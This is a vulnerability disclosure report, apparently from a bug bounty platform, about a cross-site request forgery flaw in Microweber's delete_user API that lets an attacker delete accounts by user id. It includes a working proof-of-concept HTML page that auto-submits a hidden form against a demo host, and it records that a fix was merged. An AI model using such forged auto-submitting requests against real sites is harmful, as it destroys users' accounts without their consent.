Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Sep 9th 2021


✍️ Description

An attacker can delete any user if they know the value of the user `id` parameter.

🕵️‍♂️ Proof of Concept

After running PoC.html, you will see that the user with id 3 has been deleted.

//PoC.html

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/delete_user">
      <input type="hidden" name="id" value="3" />
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

💥 Impact

With this CSRF attack, the user with id 3 is deleted.

We have contacted a member of the microweber team and are waiting to hear back 3 months ago
Peter Ivanov confirmed that a fix has been merged on 5383c2 3 months ago
Peter Ivanov has been awarded the fix bounty